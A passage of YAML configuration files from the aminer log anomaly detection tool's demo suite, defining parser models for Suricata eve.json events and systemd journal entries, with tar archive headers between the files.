'uptime' - id: kernel_packets type: DecimalIntegerValueModelElement name: 'kernel_packets' - id: kernel_drops type: 
DecimalIntegerValueModelElement name: 'kernel_drops' - id: pkts type: DecimalIntegerValueModelElement name: 'pkts' - id: bytes type: DecimalIntegerValueModelElement name: 'bytes' - id: invalid type: DecimalIntegerValueModelElement name: 'invalid' - id: ipv4 type: DecimalIntegerValueModelElement name: 'ipv4' - id: ipv6 type: DecimalIntegerValueModelElement name: 'ipv6' - id: ethernet type: DecimalIntegerValueModelElement name: 'ethernet' - id: raw type: DecimalIntegerValueModelElement name: 'raw' - id: null_counts type: DecimalIntegerValueModelElement name: 'null' - id: sll type: DecimalIntegerValueModelElement name: 'sll' - id: tcp type: DecimalIntegerValueModelElement name: 'tcp' - id: udp type: DecimalIntegerValueModelElement name: 'udp' - id: sctp type: DecimalIntegerValueModelElement name: 'sctp' - id: icmpv4 type: DecimalIntegerValueModelElement name: 'icmpv4' - id: icmpv6 type: DecimalIntegerValueModelElement name: 'icmpv6' - id: ppp type: DecimalIntegerValueModelElement name: 'ppp' - id: pppoe type: DecimalIntegerValueModelElement name: 'pppoe' - id: gre type: DecimalIntegerValueModelElement name: 'gre' - id: vlan type: DecimalIntegerValueModelElement name: 'vlan' - id: vlan_qinq type: DecimalIntegerValueModelElement name: 'vlan_qinq' - id: teredo type: DecimalIntegerValueModelElement name: 'teredo' - id: ipv4_in_ipv6 type: DecimalIntegerValueModelElement name: 'ipv4_in_ipv6' - id: ipv6_in_ipv6 type: DecimalIntegerValueModelElement name: 'ipv6_in_ipv6' - id: mpls type: DecimalIntegerValueModelElement name: 'mpls' - id: avg_pkt_size type: DecimalIntegerValueModelElement name: 'avg_pkt_size' - id: max_pkt_size type: DecimalIntegerValueModelElement name: 'max_pkt_size' - id: erspan type: DecimalIntegerValueModelElement name: 'erspan' - id: invalid_ip_version type: DecimalIntegerValueModelElement name: 'invalid_ip_version' - id: pkt_too_small type: DecimalIntegerValueModelElement name: 'pkt_too_small' - id: unsupported_type type: DecimalIntegerValueModelElement 
name: 'unsupported_type' - id: memcap type: DecimalIntegerValueModelElement name: 'memcap' - id: spare type: DecimalIntegerValueModelElement name: 'spare' - id: emerg_mode_entered type: DecimalIntegerValueModelElement name: 'emerg_mode_entered' - id: emerg_mode_over type: DecimalIntegerValueModelElement name: 'emerg_mode_over' - id: tcp_reuse type: DecimalIntegerValueModelElement name: 'tcp_reuse' - id: memuse type: DecimalIntegerValueModelElement name: 'memuse' - id: fragments type: DecimalIntegerValueModelElement name: 'fragments' - id: reassembled type: DecimalIntegerValueModelElement name: 'reassembled' - id: timeouts type: DecimalIntegerValueModelElement name: 'timeouts' - id: max_frag_hits type: DecimalIntegerValueModelElement name: 'max_frag_hits' - id: sessions type: DecimalIntegerValueModelElement name: 'sessions' - id: ssn_memcap_drop type: DecimalIntegerValueModelElement name: 'ssn_memcap_drop' - id: pseudo type: DecimalIntegerValueModelElement name: 'pseudo' - id: pseudo_failed type: DecimalIntegerValueModelElement name: 'pseudo_failed' - id: invalid_checksum type: DecimalIntegerValueModelElement name: 'invalid_checksum' - id: no_flow type: DecimalIntegerValueModelElement name: 'no_flow' - id: syn type: DecimalIntegerValueModelElement name: 'syn' - id: synack type: DecimalIntegerValueModelElement name: 'synack' - id: rst type: DecimalIntegerValueModelElement name: 'rst' - id: segment_memcap_drop type: DecimalIntegerValueModelElement name: 'segment_memcap_drop' - id: stream_depth_reached type: DecimalIntegerValueModelElement name: 'stream_depth_reached' - id: reassembly_gap type: DecimalIntegerValueModelElement name: 'reassembly_gap' - id: reassembly_memuse type: DecimalIntegerValueModelElement name: 'reassembly_memuse' - id: alert type: DecimalIntegerValueModelElement name: 'alert' - id: http type: DecimalIntegerValueModelElement name: 'http' - id: ftp type: DecimalIntegerValueModelElement name: 'ftp' - id: smtp type: DecimalIntegerValueModelElement 
name: 'smtp' - id: tls type: DecimalIntegerValueModelElement name: 'tls' - id: ssh type: DecimalIntegerValueModelElement name: 'ssh' - id: imap type: DecimalIntegerValueModelElement name: 'imap' - id: msn type: DecimalIntegerValueModelElement name: 'msn' - id: smb type: DecimalIntegerValueModelElement name: 'smb' - id: dcerpc_tcp type: DecimalIntegerValueModelElement name: 'dcerpc_tcp' - id: dns_tcp type: DecimalIntegerValueModelElement name: 'dns_tcp' - id: failed_tcp type: DecimalIntegerValueModelElement name: 'failed_tcp' - id: dcerpc_udp type: DecimalIntegerValueModelElement name: 'dcerpc_udp' - id: dns_udp type: DecimalIntegerValueModelElement name: 'dns_udp' - id: failed_udp type: DecimalIntegerValueModelElement name: 'failed_udp' - id: closed_pruned type: DecimalIntegerValueModelElement name: 'closed_pruned' - id: new_pruned type: DecimalIntegerValueModelElement name: 'new_pruned' - id: est_pruned type: DecimalIntegerValueModelElement name: 'est_pruned' - id: bypassed_pruned type: DecimalIntegerValueModelElement name: 'bypassed_pruned' - id: flows_checked type: DecimalIntegerValueModelElement name: 'flows_checked' - id: flows_notimeout type: DecimalIntegerValueModelElement name: 'flows_notimeout' - id: flows_timeout type: DecimalIntegerValueModelElement name: 'flows_timeout' - id: flows_timeout_inuse type: DecimalIntegerValueModelElement name: 'flows_timeout_inuse' - id: flows_removed type: DecimalIntegerValueModelElement name: 'flows_removed' - id: rows_checked type: DecimalIntegerValueModelElement name: 'rows_checked' - id: rows_skipped type: DecimalIntegerValueModelElement name: 'rows_skipped' - id: rows_empty type: DecimalIntegerValueModelElement name: 'rows_empty' - id: rows_busy type: DecimalIntegerValueModelElement name: 'rows_busy' - id: rows_maxlen type: DecimalIntegerValueModelElement name: 'rows_maxlen' - id: memcap_state type: DecimalIntegerValueModelElement name: 'memcap_state' - id: memcap_global type: DecimalIntegerValueModelElement name: 
'memcap_global' - id: tcp_flags type: FixedWordlistDataModelElement name: 'tcp_flags' args: - '1b' - '1f' - '1a' - '17' - '13' - '16' - '12' - '06' - id: tcp_flags_ts type: FixedWordlistDataModelElement name: 'tcp_flags_ts' args: - '1b' - '1f' - '1a' - '17' - '13' - '16' - '12' - '06' - id: tcp_flags_tc type: FixedWordlistDataModelElement name: 'tcp_flags_tc' args: - '1b' - '1f' - '1a' - '17' - '13' - '16' - '12' - '06' - id: action type: FixedWordlistDataModelElement name: 'action' args: - 'allowed' - id: gid type: DecimalIntegerValueModelElement name: 'gid' - id: signature_id type: DecimalIntegerValueModelElement name: 'signature_id' - id: rev type: DecimalIntegerValueModelElement name: 'rev' - id: signature type: FixedWordlistDataModelElement name: 'signature' args: - 'ET POLICY Http Client Body contains pass= in cleartext' - id: category type: FixedWordlistDataModelElement name: 'category' args: - 'Potential Corporate Privacy Violation' - id: severity type: DecimalIntegerValueModelElement name: 'severity' - id: subject type: FixedDataModelElement name: 'subject' args: 'CN=mail.spiral.com' - id: issuerdn type: FixedDataModelElement name: 'issuerdn' args: 'CN=ChangeMe' - id: fingerprint type: FixedDataModelElement name: 'fingerprint' args: '4a:cf:f5:f8:ce:55:c7:45:08:c5:21:a0:2d:b6:f5:0f:3c:e0:a3:17' - id: sni type: FixedDataModelElement name: 'sni' args: 'mail.spiral.com' - id: version type: FixedDataModelElement name: 'version' args: 'TLS 1.2' - id: notbefore type: DateTimeModelElement name: 'notbefore' date_format: '%Y-%m-%dT%H:%M:%S' - id: notafter type: DateTimeModelElement name: 'notafter' date_format: '%Y-%m-%dT%H:%M:%S' - id: json start: True type: JsonModelElement name: 'model' optional_key_prefix: '_' key_parser_dict: timestamp: timestamp _flow_id: _flow_id _in_iface: _in_iface event_type: event_type _src_ip: _src_ip _src_port: _src_port _dest_ip: _dest_ip _dest_port: _dest_port _proto: _proto _icmp_type: _icmp_type _icmp_code: _icmp_code _dns: type: 
type id: id _rcode: _rcode rrname: rrname _rrtype: _rrtype _ttl: _ttl _tx_id: _tx_id _tx_id: _tx_id _http: hostname: hostname url: url http_user_agent: http_user_agent _http_content_type: _http_content_type _http_refer: _http_refer http_method: http_method protocol: protocol _redirect: _redirect _status: _status length: length _app_proto: _app_proto _app_proto_tc: _app_proto_tc _fileinfo: filename: url state: file_state stored: bool_wordlist size: size _tx_id: _tx_id _flow: pkts_toserver: pkts_toserver pkts_toclient: pkts_toclient bytes_toserver: bytes_toserver bytes_toclient: bytes_toclient start: start end: end age: age state: conn_state reason: reason alerted: bool_wordlist _stats: uptime: uptime capture: kernel_packets: kernel_packets kernel_drops: kernel_drops decoder: pkts: pkts bytes: bytes invalid: invalid ipv4: ipv4 ipv6: ipv6 ethernet: ethernet raw: raw null: null_counts sll: sll tcp: tcp udp: udp sctp: sctp icmpv4: icmpv4 icmpv6: icmpv6 ppp: ppp pppoe: pppoe gre: gre vlan: vlan vlan_qinq: vlan_qinq teredo: teredo ipv4_in_ipv6: ipv4_in_ipv6 ipv6_in_ipv6: ipv6_in_ipv6 mpls: mpls avg_pkt_size: avg_pkt_size max_pkt_size: max_pkt_size erspan: erspan ipraw: invalid_ip_version: invalid_ip_version ltnull: pkt_too_small: pkt_too_small unsupported_type: unsupported_type dce: pkt_too_small: pkt_too_small flow: memcap: memcap spare: spare emerg_mode_entered: emerg_mode_entered emerg_mode_over: emerg_mode_over tcp_reuse: tcp_reuse memuse: memuse defrag: ipv4: fragments: fragments reassembled: reassembled timeouts: timeouts ipv6: fragments: fragments reassembled: reassembled timeouts: timeouts max_frag_hits: max_frag_hits tcp: sessions: sessions ssn_memcap_drop: ssn_memcap_drop pseudo: pseudo pseudo_failed: pseudo_failed invalid_checksum: invalid_checksum no_flow: no_flow syn: syn synack: synack rst: rst segment_memcap_drop: segment_memcap_drop stream_depth_reached: stream_depth_reached reassembly_gap: reassembly_gap memuse: memuse reassembly_memuse: reassembly_memuse 
detect: alert: alert app_layer: flow: http: http ftp: ftp smtp: smtp tls: tls ssh: ssh imap: imap msn: msn smb: smb dcerpc_tcp: dcerpc_tcp dns_tcp: dns_tcp failed_tcp: failed_tcp dcerpc_udp: dcerpc_udp dns_udp: dns_udp failed_udp: failed_udp tx: http: http smtp: smtp tls: tls dns_tcp: dns_tcp dns_udp: dns_udp flow_mgr: closed_pruned: closed_pruned new_pruned: new_pruned est_pruned: est_pruned bypassed_pruned: bypassed_pruned flows_checked: flows_checked flows_notimeout: flows_notimeout flows_timeout: flows_timeout flows_timeout_inuse: flows_timeout_inuse flows_removed: flows_removed rows_checked: rows_checked rows_skipped: rows_skipped rows_empty: rows_empty rows_busy: rows_busy rows_maxlen: rows_maxlen dns: memuse: memuse memcap_state: memcap_state memcap_global: memcap_global http: memuse: memuse memcap: memcap _tcp: tcp_flags: tcp_flags tcp_flags_ts: tcp_flags_ts tcp_flags_tc: tcp_flags_tc syn: bool_wordlist _fin: bool_wordlist _rst: bool_wordlist _psh: bool_wordlist ack: bool_wordlist state: conn_state _alert: action: action gid: gid signature_id: signature_id rev: rev signature: signature category: category severity: severity _tls: subject: subject issuerdn: issuerdn fingerprint: fingerprint sni: sni version: version notbefore: notbefore notafter: notafter Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json-input-demo-config.yml000066400000000000000000000043671500476301700327070ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/syslog' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 
MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: id type: VariableByteDataModelElement name: 'id' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-.' - id: value type: VariableByteDataModelElement name: 'value' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-.' - id: buttonNames type: FixedWordlistDataModelElement name: 'buttonNames' args: - 'New' - 'Open' - 'Close' - id: buttonOnclick type: FixedWordlistDataModelElement name: 'buttonOnclick' args: - 'CreateNewDoc()' - 'OpenDoc()' - 'CloseDoc()' - id: json start: True type: JsonModelElement name: 'model' key_parser_dict: menu: id: id value: value popup: menuitem: - value: buttonNames onclick: buttonOnclick Input: timestamp_paths: None json_format: True Analysis: - type: NewMatchPathValueComboDetector id: NewMatchPathValueCombo paths: - "/model/menu/id/id" - "/model/menu/value/value" learn_mode: True output_logline: True - type: NewMatchPathValueDetector id: NewMatchPathValue paths: - "/model/menu/id/id" - "/model/menu/value/value" learn_mode: True output_logline: True - type: SimpleUnparsedAtomHandler id: SimpleUnparsedAtomHandler EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json-journal-demo.yml000066400000000000000000000765451500476301700317660ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/journal.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 
3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: delimiter type: DelimitedDataModelElement name: 'delimiter' delimiter: '=' consume_delimiter: true - id: hex type: HexStringModelElement name: 'hex' - id: __CURSOR type: SequenceModelElement name: '__CURSOR' args: - delimiter - hex - delimiter - hex - delimiter - hex - delimiter - hex - delimiter - hex - delimiter - hex - id: __REALTIME_TIMESTAMP type: DateTimeModelElement name: '__REALTIME_TIMESTAMP' date_format: '%s' - id: __MONOTONIC_TIMESTAMP type: DateTimeModelElement name: '__MONOTONIC_TIMESTAMP' date_format: '%s' - id: _BOOT_ID type: HexStringModelElement name: '_BOOT_ID' - id: optional_key__SOURCE_MONOTONIC_TIMESTAMP type: DateTimeModelElement name: 'optional_key__SOURCE_MONOTONIC_TIMESTAMP' date_format: '%s' - id: _TRANSPORT type: FixedWordlistDataModelElement name: '_TRANSPORT' args: - 'kernel' - 'stdout' - 'driver' - 'journal' - 'audit' - 'syslog' - id: optional_key_PRIORITY type: DecimalIntegerValueModelElement name: 'optional_key_PRIORITY' - id: optional_key__KERNEL_SUBSYSTEM type: FixedWordlistDataModelElement name: 'optional_key__KERNEL_SUBSYSTEM' args: - 'acpi' - 'pci_bus' - 'pci' - 'ubs' - 'pnp' - 'scsi' - 'usb' - 'misc' - 'virtio' - 'hid' - id: optional_key__KERNEL_DEVICE type: FixedWordlistDataModelElement name: 'optional_key__KERNEL_DEVICE' args: - '+acpi:PNP0A03:00' - '+pci_bus:0000:00' - '+pci:0000:00:00.0' - '+pci:0000:00:01.0' - '+pci:0000:00:01.1' - '+pci:0000:00:01.2' - '+pci:0000:00:01.3' - '+pci:0000:00:02.0' - '+pci:0000:00:03.0' - '+pci:0000:00:04.0' - '+pci:0000:00:05.0' - '+pnp:00:00' - '+pnp:00:01' - '+pnp:00:02' - '+pnp:00:03' - '+pnp:00:04' - '+scsi:host0' - '+scsi:host1' - 'c189:0' - '+usb:1-0:1.0' - '+usb:1-1' - 'c10:236' - '+virtio:virtio0' - 'c189:1' - '+hid:0003:0627:0001.0001' - id: optional_key__UDEV_DEVNODE type: FixedWordlistDataModelElement name: 'optional_key__UDEV_DEVNODE' args: - '/dev/bus/usb/001/001' - '/dev/bus/usb/001/002' - '/dev/mapper/control' - id: 
optional_key__UDEV_SYSNAME type: FixedWordlistDataModelElement name: 'optional_key__UDEV_SYSNAME' args: - 'PNP0A03:00' - 'usb1' - 'host0' - 'host1' - '00:00' - '00:01' - '00:02' - '00:03' - '00:04' - '0000:00:00.0' - '0000:00:01.0' - '0000:00:01.1' - '0000:00:01.2' - '0000:00:01.3' - '0000:00:02.0' - '0000:00:03.0' - '0000:00:04.0' - '0000:00:05.0' - '0000:00' - '1-0:1.0' - '1-1' - 'device-mapper' - 'virtio0' - '0003:0627:0001.0001' - id: SYSLOG_FACILITY type: DecimalIntegerValueModelElement name: 'SYSLOG_FACILITY' - id: optional_key_CODE_FILE type: FixedWordlistDataModelElement name: 'optional_key_CODE_FILE' args: - '../src/modules-load/modules-load.c' - '../src/core/unit.c' - '../src/udev/net/ethtool-util.c' - '../src/network/networkd.c' - '../src/resolve/resolved-dns-trust-anchor.c' - '../src/login/logind-seat.c' - '../src/core/manager.c' - '../src/login/logind-session.c' - '../src/core/job.c' - '../src/network/networkd-link.c' - '../src/timesync/timesyncd-manager.c' - '../src/network/networkd-dhcp6.c' - '../src/network/networkd-dhcp4.c' - '../src/resolve/resolved-manager.c' - '../src/network/wait-online/manager.c' - '../src/network/networkd-manager.c' - '../src/login/logind-button.c' - '../src/hostname/hostnamed.c' - '../src/resolve/resolved-dns-transaction.c' - id: optional_key_CODE_LINE type: DecimalIntegerValueModelElement name: 'optional_key_CODE_LINE' - id: optional_key_CODE_FUNC type: FixedWordlistDataModelElement name: 'optional_key_CODE_FUNC' args: - 'load_module' - 'unit_status_log_starting_stopping_reloading' - 'job_log_status_message' - 'ethtool_set_glinksettings' - 'main' - 'dns_trust_anchor_dump' - 'seat_start' - 'manager_notify_finished' - 'session_start' - 'link_update' - 'manager_network_event_handler' - 'link_ipv6ll_gained' - 'dhcp6_verify_link' - 'link_enable_ipv6' - 'dhcp_lease_acquired' - 'manager_watch_hostname' - 'link_enter_configured' - 'manager_all_configured' - 'manager_set_hostname' - 'button_open' - 'method_set_hostname' - 
'manager_receive_response' - 'dns_transaction_process_reply' - id: optional_key_INTERFACE type: FixedWordlistDataModelElement name: 'optional_key_INTERFACE' args: - 'ens3' - 'lo' - id: SYSLOG_IDENTIFIER type: FixedWordlistDataModelElement name: 'SYSLOG_IDENTIFIER' args: - 'kernel' - 'stdout' - 'systemd-journald' - 'systemd-modules-load' - 'systemd-udevd' - 'systemd-networkd-wait-online' - 'systemd-timesyncd' - 'systemd-resolved' - 'systemd-networkd' - 'systemd-logind' - 'systemd-hostnamed' - 'systemd' - 'apparmor' - 'audit' - 'dhclient' - 'cloud-init' - 'useradd' - 'rsyslogd' - 'passwd' - 'cron' - '/usr/sbin/irqbalance' - 'apport' - 'pollinate' - 'dbus-daemon' - 'polkitd' - 'grub-common' - 'lxcfs' - 'accounts-daemon' - 'networkd-dispatcher' - 'snapd' - 'sshd' - '/usr/bin/logger' - 'ec2' - 'sudo' - id: optional_key_SYSLOG_PID type: DecimalIntegerValueModelElement name: 'optional_key_SYSLOG_PID' - id: optional_key_MESSAGE_ID type: HexStringModelElement name: 'optional_key_MESSAGE_ID' - id: optional_key_SEAT_ID type: FixedWordlistDataModelElement name: 'optional_key_SEAT_ID' args: - 'seat0' - id: msg type: AnyByteDataModelElement name: 'msg' - id: MESSAGE type: OptionalMatchModelElement name: 'MESSAGE' args: msg - id: optional_key__MACHINE_ID type: HexStringModelElement name: 'optional_key__MACHINE_ID' - id: optional_key__HOSTNAME type: FixedWordlistDataModelElement name: 'optional_key__HOSTNAME' args: - 'ubuntu' - 'test-1' - id: optional_key__PID type: DecimalIntegerValueModelElement name: 'optional_key__PID' - id: optional_key__UID type: DecimalIntegerValueModelElement name: 'optional_key__UID' - id: optional_key__GID type: DecimalIntegerValueModelElement name: 'optional_key__GID' - id: optional_key__COMM type: FixedWordlistDataModelElement name: 'optional_key__COMM' args: - 'systemd-journal' - 'apparmor_parser' - 'apparmor' - 'systemd-udevd' - 'dhclient' - 'systemd-network' - 'systemd-timesyn' - 'systemd-resolve' - 'useradd' - 'rsyslogd' - 'passwd' - 'cron' - 
'dbus-daemon' - 'polkitd' - 'lxcfs' - 'accounts-daemon' - 'systemd-logind' - 'systemd-hostnam' - 'systemd' - 'networkd-dispat' - 'snapd' - 'sshd' - 'sudo' - 'cloud-init' - 'logger' - '(systemd)' - id: optional_key__EXE type: FixedWordlistDataModelElement name: 'optional_key__EXE' args: - '/lib/systemd/systemd-journald' - '/bin/dash' - '/lib/systemd/systemd-udevd' - '/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient' - '/usr/bin/python3.6' - '/lib/systemd/systemd-networkd' - '/lib/systemd/systemd-timesyncd' - '/lib/systemd/systemd-resolved' - '/usr/sbin/useradd' - '/usr/sbin/rsyslogd' - '/usr/bin/passwd' - '/usr/sbin/cron' - '/usr/bin/dbus-daemon' - '/usr/lib/policykit-1/polkitd' - '/usr/bin/lxcfs' - '/usr/lib/accountsservice/accounts-daemon' - '/lib/systemd/systemd-logind' - '/lib/systemd/systemd-hostnamed' - '/usr/lib/snapd/snapd' - '/usr/sbin/sshd' - '/usr/bin/logger' - '/usr/bin/sudo' - '/lib/systemd/systemd' - id: optional_key__CMDLINE type: FixedWordlistDataModelElement name: 'optional_key__CMDLINE' args: - '/lib/systemd/systemd-journald' - '/bin/sh /etc/init.d/apparmor start' - '/lib/systemd/systemd-udevd' - '/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true' - '/usr/bin/python3 /usr/bin/cloud-init init --local' - '/usr/bin/python3 /usr/bin/cloud-init modules --mode=final' - '/lib/systemd/systemd-networkd' - '/lib/systemd/systemd-timesyncd' - '/lib/systemd/systemd-resolved' - 'useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m' - '/usr/sbin/rsyslogd -n' - 'passwd -l ubuntu' - '/usr/sbin/cron -f' - '/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only' - '/usr/lib/policykit-1/polkitd --no-debug' - '/usr/bin/lxcfs /var/lib/lxcfs/' - '/usr/lib/accountsservice/accounts-daemon' - 
'/lib/systemd/systemd-logind' - '/lib/systemd/systemd-hostnamed' - '/usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers' - '/usr/lib/snapd/snapd' - '/usr/sbin/sshd -D' - 'logger -p user info -t ec2 -s' - 'sudo -i' - '/sbin/init' - '/usr/bin/python3 /usr/bin/cloud-init init' - 'logger --id=787 -t pollinate client verified challenge/response with [https://entropy.ubuntu.com/]' - 'logger --id=787 -t pollinate client hashed response from [https://entropy.ubuntu.com/]' - 'logger --id=787 -t pollinate client successfully seeded [/dev/urandom]' - '/usr/bin/python3 /usr/bin/cloud-init modules --mode=config' - 'sshd: ubuntu [priv]' - '(systemd)' - '/lib/systemd/systemd --user' - id: optional_key__CAP_EFFECTIVE type: HexStringModelElement name: 'optional_key__CAP_EFFECTIVE' - id: optional_key__SELINUX_CONTEXT type: FixedWordlistDataModelElement name: 'optional_key__SELINUX_CONTEXT' args: - 'unconfined\n' - id: optional_key__SYSTEMD_CGROUP type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_CGROUP' args: - '/system.slice/systemd-journald.service' - '/system.slice/apparmor.service' - '/system.slice/systemd-udevd.service' - '/system.slice/cloud-init-local.service' - '/system.slice/systemd-networkd.service' - '/system.slice/systemd-timesyncd.service' - '/system.slice/systemd-resolved.service' - '/system.slice/systemd-networkd-wait-online.service' - '/system.slice/rsyslog.service' - '/system.slice/cron.service' - '/system.slice/dbus.service' - '/system.slice/polkit.service' - '/system.slice/lxcfs.service' - '/system.slice/accounts-daemon.service' - '/system.slice/systemd-logind.service' - '/system.slice/systemd-hostnamed.service' - '/system.slice/networkd-dispatcher.service' - '/system.slice/snapd.service' - '/system.slice/ssh.service' - '/system.slice/cloud-final.service' - '/system.slice/cloud-init.service' - '/system.slice/pollinate.service' - '/system.slice/cloud-config.service' - '/user.slice/user-1000.slice/session-1.scope' - '/init.scope' - 
'/user.slice/user-1000.slice/user@1000.service/init.scope' - '/user.slice/user-1000.slice/user@1000.service' - id: optional_key__SYSTEMD_UNIT type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_UNIT' args: - 'systemd-journald.service' - 'systemd-networkd.service' - 'systemd-timesyncd.service' - 'systemd-resolved.service' - 'systemd-networkd-wait-online.service' - 'systemd-udevd.service' - 'systemd-logind.service' - 'systemd-hostnamed.service' - 'apparmor.service' - 'cloud-init-local.service' - 'rsyslog.service' - 'cron.service' - 'apport.service' - 'dbus.service' - 'polkit.service' - 'grub-common.service' - 'lxcfs.service' - 'accounts-daemon.service' - 'networkd-dispatcher.service' - 'snapd.service' - 'ssh.service' - 'cloud-final.service' - 'session-1.scope' - 'init.scope' - 'cloud-init.service' - 'pollinate.service' - 'cloud-config.service' - 'user@1000.service' - id: optional_key__SYSTEMD_SLICE type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_SLICE' args: - 'system.slice' - '-.slice' - 'user-1000.slice' - id: optional_key__SYSTEMD_INVOCATION_ID type: HexStringModelElement name: 'optional_key__SYSTEMD_INVOCATION_ID' - id: optional_key_JOURNAL_NAME type: FixedWordlistDataModelElement name: 'optional_key_JOURNAL_NAME' args: - 'Runtime journal' - 'System journal' - id: fixed_journal_paths type: FixedWordlistDataModelElement name: 'fixed_journal_paths' args: - '/var/log/journal/' - '/run/log/journal/' - id: optional_key_JOURNAL_PATH type: SequenceModelElement name: 'optional_key_JOURNAL_PATH' args: - fixed_journal_paths - hex - id: optional_key_CURRENT_USE type: DecimalIntegerValueModelElement name: 'optional_key_CURRENT_USE' - id: float_number type: DecimalFloatValueModelElement name: 'float_number' - id: memory type: FixedWordlistDataModelElement name: 'memory' args: - 'M' - 'G' - 'K' - id: optional_key_CURRENT_USE_PRETTY type: SequenceModelElement name: 'optional_key_CURRENT_USE_PRETTY' args: - float_number - memory - id: 
optional_key_MAX_USE type: DecimalIntegerValueModelElement name: 'optional_key_MAX_USE' - id: optional_key_MAX_USE_PRETTY type: SequenceModelElement name: 'optional_key_MAX_USE_PRETTY' args: - float_number - memory - id: optional_key_DISK_KEEP_FREE type: DecimalIntegerValueModelElement name: 'optional_key_DISK_KEEP_FREE' - id: optional_key_DISK_KEEP_FREE_PRETTY type: SequenceModelElement name: 'optional_key_DISK_KEEP_FREE_PRETTY' args: - float_number - memory - id: optional_key_DISK_AVAILABLE type: DecimalIntegerValueModelElement name: 'optional_key_DISK_AVAILABLE' - id: optional_key_DISK_AVAILABLE_PRETTY type: SequenceModelElement name: 'optional_key_DISK_AVAILABLE_PRETTY' args: - float_number - memory - id: optional_key_LIMIT type: DecimalIntegerValueModelElement name: 'optional_key_LIMIT' - id: optional_key_LIMIT_PRETTY type: SequenceModelElement name: 'optional_key_LIMIT_PRETTY' args: - float_number - memory - id: optional_key_AVAILABLE type: DecimalIntegerValueModelElement name: 'optional_key_AVAILABLE' - id: optional_key_AVAILABLE_PRETTY type: SequenceModelElement name: 'optional_key_AVAILABLE_PRETTY' args: - float_number - memory - id: optional_key__SOURCE_REALTIME_TIMESTAMP type: DecimalIntegerValueModelElement name: 'optional_key__SOURCE_REALTIME_TIMESTAMP' - id: optional_key_JOB_TYPE type: FixedWordlistDataModelElement name: 'optional_key_JOB_TYPE' args: - 'start' - id: optional_key_JOB_RESULT type: FixedWordlistDataModelElement name: 'optional_key_JOB_RESULT' args: - 'done' - id: optional_key_UNIT type: FixedWordlistDataModelElement name: 'optional_key_UNIT' args: - 'systemd-udevd.service' - 'systemd-journal-flush.service' - 'systemd-sysctl.service' - 'systemd-udev-trigger.service' - 'systemd-machine-id-commit.service' - 'systemd-update-utmp.service' - 'systemd-ask-password-console.path' - 'systemd-tmpfiles-setup.service' - 'systemd-timesyncd.service' - 'systemd-networkd.service' - 'systemd-networkd-wait-online.service' - 'systemd-resolved.service' - 
'systemd-tmpfiles-clean.timer' - 'systemd-logind.service' - 'systemd-user-sessions.service' - 'systemd-hostnamed.service' - 'systemd-update-utmp-runlevel.service' - 'network-online.target' - 'keyboard-setup.service' - 'cryptsetup.target' - 'local-fs-pre.target' - 'dev-ttyS0.device' - 'systemd-rfkill.socket' - 'dev-disk-by-label-UEFI.device' - 'boot-efi.mount' - 'local-fs.target' - 'plymouth-read-write.service' - 'console-setup.service' - 'ebtables.service' - 'apparmor.service' - 'time-sync.target' - 'cloud-init-local.service' - 'network-pre.target' - 'nss-lookup.target' - 'network.target' - 'cloud-init.service' - 'blk-availability.service' - 'remote-fs-pre.target' - 'remote-fs.target' - 'cloud-config.target' - 'sysinit.target' - 'uuidd.socket' - 'snapd.socket' - 'motd-news.timer' - 'dbus.socket' - 'apt-daily.timer' - 'apt-daily-upgrade.timer' - 'lxd.socket' - 'iscsid.socket' - 'fstrim.timer' - 'timers.target' - 'acpid.path' - 'acpid.socket' - 'paths.target' - 'basic.target' - 'lxd-containers.service' - 'atd.service' - 'cron.service' - 'sockets.target' - 'networkd-dispatcher.service' - 'apport.service' - 'irqbalance.service' - 'rsyslog.service' - 'accounts-daemon.service' - 'pollinate.service' - 'grub-common.service' - 'lxcfs.service' - 'dbus.service' - 'snapd.service' - 'polkit.service' - 'unattended-upgrades.service' - 'plymouth-quit.service' - 'plymouth-quit-wait.service' - 'serial-getty@ttyS0.service' - 'setvtrgb.service' - 'system-getty.slice' - 'getty@tty1.service' - 'getty.target' - 'ssh.service' - 